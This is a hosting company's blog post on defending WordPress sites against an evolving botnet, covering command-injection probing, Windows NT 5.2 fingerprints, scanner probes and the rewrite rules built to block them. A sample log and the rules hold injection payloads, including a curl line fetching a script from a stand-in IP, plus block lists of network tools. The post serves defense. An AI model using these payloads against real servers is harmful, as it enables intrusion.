You might think that once you deploy bot protection rules, the problem is solved. We thought so too — for about 18 hours. Then the bots came back, and they'd learned from their mistakes.
This is Part 2 of our bot protection story. If you haven't read the first installment — How We Protect Our WordPress Sites from Bot Attacks — start there for the full picture of Day 1. This post covers what happened next: how an organized botnet evolved its attack strategy overnight, how we detected the shift in real time, and how we built a repeatable threat response playbook that now protects every site we host.
The Day 1 Recap
On a recent Wednesday, our Amsterdam server spiked to a load of 20.75 — roughly ten times its normal operating level. A distributed botnet was hammering two government websites with POST requests using real-looking browser user agents to bypass our LiteSpeed cache layer. We deployed updated bot protection rules fleet-wide, blocking POST-based cache bypass, fake user agent signatures, and service discovery probes. Server load dropped from 20 to under 3 within minutes. Problem solved.
Until the next morning.
Day 2: The Bots Evolve
At 9:30 AM the following day, the same server spiked again — this time to a load of 14, roughly 14 times baseline. Our monitoring caught it immediately, and when we pulled up the access logs, we saw something different. The bots had adapted.
Day 1's attack used POST requests to bypass the cache. We blocked POST requests with no referrer. So on Day 2, the attackers switched entirely to GET requests. But these weren't ordinary page loads. They were injecting shell commands directly into URL query parameters — specifically targeting Gravity Forms field parameters that get passed through the URL.
Here's what the attack looked like in the access logs. Instead of normal form field values, the query strings contained commands like curl, nslookup, wget, and base64. Some requests included hex-encoded byte sequences. Others attempted Freemarker Server-Side Template Injection (SSTI) — a technique where the attacker injects template expressions hoping the server will evaluate them and execute arbitrary code.
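To make that concrete, here is a minimal sketch of the kind of log triage involved. The log excerpt is fabricated for illustration (the real callback domain and payloads are withheld), but the grep pattern shows the general shape of surfacing GET requests whose query strings carry injection tooling:

```shell
# Fabricated combined-log excerpt; IPs, paths, and domains are illustrative only.
cat > /tmp/access-sample.log <<'EOF'
203.0.113.7 - - [12/Mar/2026:09:31:02 +0100] "GET /?input_1=nslookup+callback.example HTTP/1.1" 200 512
198.51.100.4 - - [12/Mar/2026:09:31:03 +0100] "GET /contact/ HTTP/1.1" 200 8312
203.0.113.9 - - [12/Mar/2026:09:31:05 +0100] "GET /?input_2=curl+http://203.0.113.66/x.sh HTTP/1.1" 200 512
EOF

# Flag GET requests whose query string mentions known injection tooling.
grep -E '"GET [^"]*\?[^"]*(curl|wget|nslookup|base64)' /tmp/access-sample.log
```

Against the sample above, only the two probe lines match; the ordinary page load passes untouched.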
This wasn't a brute-force attack. This was methodical Remote Code Execution (RCE) probing by a sophisticated botnet.
How Blind RCE Detection Works
The most telling detail was the callback domain. Dozens of requests included references to a domain used exclusively for blind RCE detection. Here's the technique:
- The bot injects a command like nslookup callback-domain.net into a query parameter
- If the server is vulnerable and actually executes the injected command, it performs a DNS lookup to the callback domain
- The attacker monitors DNS queries hitting that callback domain
- If a DNS query arrives from your server's IP address, they know the server is vulnerable to command injection
- They then escalate to more dangerous payloads — data exfiltration, backdoor installation, cryptomining
This is called "out-of-band" detection. The attacker never sees the server's HTTP response — they don't need to. The callback itself is the signal. It's an elegant and dangerous technique, and it means every one of these probing requests was a test: "Can I run arbitrary commands on this machine?"
The answer, for every site we manage, was no. WordPress and Gravity Forms don't evaluate query parameters as shell commands. But the bots don't know that upfront — they spray thousands of sites hoping to find one that's running a vulnerable plugin, a misconfigured PHP handler, or an exposed debugging endpoint.
The Fingerprint That Gave Them Away
While the Day 1 bots rotated through convincing modern browser user agents, the Day 2 botnet made a mistake: every request carried a Windows NT 5.2 user agent string. That's Windows Server 2003 — an operating system released in 2003 and end-of-lifed in 2015.
Nobody is browsing the internet on Windows Server 2003 in 2026. Not a single legitimate user. This was a dead giveaway: a hardcoded user agent string in the bot's configuration that nobody had bothered to update since the botnet was originally built.
We catalog these fingerprints. They're free wins — patterns that you can block with zero risk of affecting legitimate traffic. And over 120 unique IP addresses were sharing this exact same obsolete fingerprint, confirming this was a coordinated botnet, not scattered scanners.
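Confirming that kind of shared fingerprint is a one-liner against the access log. A small sketch with fabricated data (in a real combined-format log, the user agent is the last quoted field and the source IP is the first column):

```shell
# Fabricated log entries; three requests from two IPs share the obsolete UA.
cat > /tmp/ua-sample.log <<'EOF'
203.0.113.7 - - [13/Mar/2026:09:31:02 +0100] "GET / HTTP/1.1" 403 199 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)"
203.0.113.8 - - [13/Mar/2026:09:31:03 +0100] "GET / HTTP/1.1" 403 199 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)"
203.0.113.7 - - [13/Mar/2026:09:31:04 +0100] "GET / HTTP/1.1" 403 199 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)"
198.51.100.4 - - [13/Mar/2026:09:31:05 +0100] "GET / HTTP/1.1" 200 999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
EOF

# Count distinct source IPs presenting the Windows NT 5.2 fingerprint.
grep 'Windows NT 5\.2' /tmp/ua-sample.log | awk '{print $1}' | sort -u | wc -l
```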
Building the Updated Rules
With the attack pattern identified, we drafted two new rule categories for our bot protection template:
Obsolete Operating System Blocking
Any request from Windows XP or Windows Server 2003 (the user agent tokens Windows NT 5.1 and 5.2) gets blocked immediately. These operating systems cannot run any modern browser. If you see one in your access logs, it is a bot — full stop. This single rule eliminated the majority of the Day 2 traffic.
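As a sketch only, such a rule can be expressed in Apache-style rewrite syntax, which LiteSpeed also reads from .htaccess (the rules we actually deploy are more extensive):

```apache
# Sketch: block the obsolete Windows NT 5.1/5.2 user agent family.
# POSIX ERE throughout, so character classes rather than PCRE shorthands.
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "Windows NT 5\.[12]" [NC]
RewriteRule .* - [F,L]
```

The [F] flag returns 403 immediately, before PHP or WordPress is ever invoked.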
Command Injection Query String Filtering
We added pattern matching on query strings for known command injection signatures: curl, wget, nslookup, base64, hex-encoded bytes, Freemarker template expressions, backtick command substitution, and the specific callback domains being used for blind RCE detection.
The key challenge with query string filtering is avoiding false positives. Legitimate form submissions, REST API calls, WooCommerce cart parameters, and WordPress admin operations all use query strings extensively. A poorly written rule here would break real functionality.
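To illustrate the shape of the trade-off, here is a hedged sketch of a query-string condition, not our production ruleset. Anchoring the tool name to a parameter boundary and requiring an encoded space after it reduces hits on innocent substrings (a slug containing "curly", for example):

```apache
# Sketch only: match injection tooling at a parameter boundary followed by
# an encoded space, plus Freemarker-style ${...} template expressions.
RewriteEngine On
RewriteCond %{QUERY_STRING} (^|[&=])(curl|wget|nslookup)(\+|%20) [NC,OR]
RewriteCond %{QUERY_STRING} \$\{[^}]*\} [NC]
RewriteRule .* - [F,L]
```

Production rules also need to account for URL-encoded variants of these payloads, which is part of why testing against real traffic matters.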
The Test Suite
Before deploying a single rule to production, we ran our automated validation suite. This is a bank of curl commands that simulates both attack patterns and legitimate traffic:
- Attack patterns: Each new rule gets tested with real payloads extracted from the access logs. Every one must return HTTP 403 (Forbidden).
- Chrome browser: A standard desktop Chrome request must return HTTP 200.
- WordPress REST API: Requests to /wp-json/ endpoints must pass through — this is how the Gutenberg editor saves content.
- WooCommerce API: Cart, checkout, and order endpoints must be unaffected.
- Gravity Forms submissions: Real form submissions with legitimate data must succeed.
- WordPress admin panel: All admin operations must work normally.
Every attack request returned 403. Every legitimate request returned 200 or the expected status code. Only then did we proceed to production deployment.
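A minimal sketch of how such a curl bank can be structured, with hypothetical endpoints and payloads. By default it only prints the planned checks; setting RUN_LIVE=1 executes them against whatever SITE points at, so nothing gets hit by accident:

```shell
# Sketch of a curl-based validation bank. SITE, payloads, and endpoints are
# illustrative, not our real suite.
SITE="${SITE:-https://staging.example.invalid}"

check() {  # check <expected-status> <description> <curl args...>
  local want="$1" desc="$2"; shift 2
  if [ "${RUN_LIVE:-0}" = "1" ]; then
    got=$(curl -s -o /dev/null -w '%{http_code}' "$@")
    [ "$got" = "$want" ] && echo "PASS $desc" || echo "FAIL $desc (got $got, want $want)"
  else
    echo "PLAN $desc -> expect $want"
  fi
}

check 403 "command-injection probe" "$SITE/?input_1=nslookup+callback.example"
check 200 "plain Chrome page load" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120" "$SITE/"
check 200 "REST API reachable" "$SITE/wp-json/"
```

The pattern generalizes: every new rule gets a 403 case built from a real logged payload, paired with 200 cases for each legitimate traffic category it could plausibly break.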
The Deployment: Detect, Analyze, Draft, Test, Stage, Prove, Expand
During this incident, we codified our threat response into a repeatable eleven-step playbook. The core steps:
- Detect: Monitoring catches the anomaly — server load spike, unusual traffic patterns, or alert from our uptime checks.
- Analyze: Pull access logs, identify the attack vector, catalog signatures (IPs, user agents, request patterns, payloads).
- Draft: Write rules targeting the identified patterns. Check for POSIX regex compliance (a lesson from Day 1 — Apache and LiteSpeed use POSIX regular expressions, where PCRE shortcuts like \d silently fail to match).
- Test: Run the automated validation suite. Confirm blocks work and legitimate traffic passes.
- Stage: Deploy to the affected site first, with a backup. Monitor access logs to confirm attack traffic is being blocked.
- Prove: Verify the impact. On Day 2, server load dropped from 14x normal to baseline within minutes. Nearly a quarter of all traffic to the affected site was malicious — and now returning 403 instantly.
- Expand: Update the canonical template and deploy fleet-wide using our automated deployment script.
- Fleet: Verify deployment across all six servers and 125 sites — zero failures required before marking complete.
- Document: Update attack pattern catalog, incident log, and client-facing communications. Every incident improves the knowledge base for the next one.
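The POSIX check in the Draft step is easy to demonstrate. grep -E speaks the same POSIX ERE dialect as Apache-style rewrite conditions, so it makes a quick sanity checker for a pattern before it goes into a rule (behavior shown assumes GNU grep):

```shell
# PCRE shorthands like \d are not special in POSIX ERE: against the input
# "14", the \d pattern finds nothing, while the character class matches.
printf '14\n' | grep -qE '\d+' 2>/dev/null && echo 'matched' || echo 'PCRE \d: no match'
printf '14\n' | grep -qE '[0-9]+' && echo 'POSIX class: matched'
```

A rule written with \d would not error out; it would simply never fire, which is the worst kind of failure for a security control.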
Every production site was updated. Zero failures. Zero client-reported issues.
The Numbers Tell the Story
Here's the timeline of the Day 2 incident:
| Time | Event |
|---|---|
| 9:30 AM | Load spike detected — server at 14x normal |
| 9:35 AM | Access log analysis begins — GET-based command injection identified |
| 9:45 AM | Attack fully classified — 120+ IPs, RCE probing via form parameters |
| 10:00 AM | Updated rules drafted |
| 10:15 AM | Automated test suite passes |
| 10:20 AM | Deployed to affected site, backup taken |
| 10:25 AM | Attack traffic returning 403, load dropping |
| 11:30 AM | Fleet-wide deployment complete — zero failures |
From detection to fleet-wide resolution: two hours. From deploying to the affected site to measurable impact: five minutes.
Days 3-5: The Scanner Probes
The command injection attacks subsided, but the probing didn't stop. Over the next three days, the same server experienced daily waves of a different type: vulnerability scanner probing. Instead of injecting shell commands, these bots were systematically requesting filenames that only exist on misconfigured or compromised servers.
The access logs showed hundreds of requests per wave for files like phpinfo.php, test.php, shell.php, pi.php, and temp.php. They also probed for archive files (.7z, .tar.gz), certificate files (.pem), database files (.mdb, .sqlite), and exposed configuration files (configs.json). Each wave came from 300-560 unique IP addresses, pushing CPU above 70% and server load to nearly 8x normal.
This is a different attack category from the RCE probing on Day 2. Where command injection tries to execute code, scanner probing is reconnaissance — the bots are looking for files that would reveal server configuration details, exposed credentials, or leftover development artifacts. A single phpinfo.php file can tell an attacker your exact PHP version, loaded extensions, server paths, environment variables, and sometimes even database credentials.
None of these files exist on any site we manage. But every request still consumed server resources — LiteSpeed had to process the rewrite rules, check the filesystem, and return a 404. Multiply that by thousands of requests from hundreds of IPs, and it's a meaningful load.
We added a new rule category to our bot protection template: scanner probe filename blocking. Any request for phpinfo.php, test.php, shell.php, or similar probe filenames now returns a 403 before the server even checks whether the file exists. Same for archive extensions, certificate files, and exposed database files. The fleet scan confirmed zero legitimate uses of any of these filenames across all 125 sites — making this a zero-risk, high-impact rule.
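In Apache-style rewrite syntax, the shape of such a rule looks roughly like this. This is a sketch, and blocking generic names like test.php is only safe because the fleet scan confirmed none of these filenames are legitimately in use:

```apache
# Sketch: deny well-known scanner probe filenames and risky extensions
# before the filesystem is ever consulted.
RewriteEngine On
RewriteCond %{REQUEST_URI} /(phpinfo|test|shell|pi|temp)\.php$ [NC,OR]
RewriteCond %{REQUEST_URI} \.(tar\.gz|7z|pem|mdb|sqlite)$ [NC]
RewriteRule .* - [F,L]
```

Returning 403 from a rewrite condition is cheaper than the 404 path, since the server never stats the filesystem or falls through to WordPress's routing.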
Why Yesterday's Rules Don't Stop Today's Attacks
This is the core lesson from these two days. On Day 1, the bots used POST-based cache bypass. We blocked it. On Day 2, they switched to GET-based command injection through query strings. The attack evolved in under 24 hours.
This is why installing a security plugin or a basic WAF and walking away isn't security. It's a checkbox. Real protection requires someone watching, analyzing, and responding — not once, but continuously. The bots don't stop iterating, and your defenses can't either.
A shared hosting provider with thousands of sites and a ticket queue doesn't have time to read your access logs. A managed hosting company with a set-and-forget firewall won't notice when attackers switch from POST to GET. And the pre-built rulesets that come with popular WordPress security plugins? They block known attack signatures from last month — not the probe that started hitting your server this morning.
Layered Defense in Practice
After these incidents, our bot protection template covers six distinct layers:
- User Agent filtering: Known bot signatures, empty/stub user agents, obsolete operating systems
- URL/path blocking: Service discovery probes, config file scanning, shell upload attempts, CMS admin hunting
- Method/referrer analysis: POST requests without a referrer (real form submissions always have one)
- Query string inspection: Command injection payloads, RCE callback domains, template injection expressions
- Scanner probe filtering: Known vulnerability scanner filenames (phpinfo.php, test.php, shell.php), archive extensions (.7z, .tar.gz), certificate files (.pem), database files (.mdb, .sqlite), and exposed configuration files
- Behavioral patterns: URL fuzzing detection, API enumeration attempts
Each layer catches attacks that slip past the others. Block one technique, and the bots pivot to the next. With six layers working together, the cost of finding a bypass goes up exponentially.
And all of these rules run at the web server level — before PHP even loads, before WordPress boots, before any plugin gets a chance to process the request. A blocked bot consumes essentially zero server resources. That's why server load drops from 14x normal to baseline within minutes of deployment: hundreds of thousands of requests that were consuming PHP workers and database connections now get rejected with a lightweight 403 before they touch the application stack.
What This Means for Your Site
Every site we host runs the same battle-tested protection template. When we stop an attack against one site, every site benefits. When we identify a new bot fingerprint, it goes into the shared template. When we build a new detection rule, it deploys across the entire fleet.
This is what managed hosting actually means. Not just keeping WordPress updated and answering support tickets. It means watching the access logs, reading the attack patterns, writing the rules, testing them, and deploying them — often before clients even know something happened.
Our technology stack is built for exactly this kind of active defense, and our premium plugin suite — included with every hosting plan — provides the layered security foundation that makes rapid threat response possible.
If your current hosting provider's security plan is "we installed Wordfence" — or if you're not sure whether anyone is watching at all — let's talk. We've been doing this for 18 years, and we respond to threats in hours, not days. Check out our managed WordPress hosting plans to see what proactive protection looks like.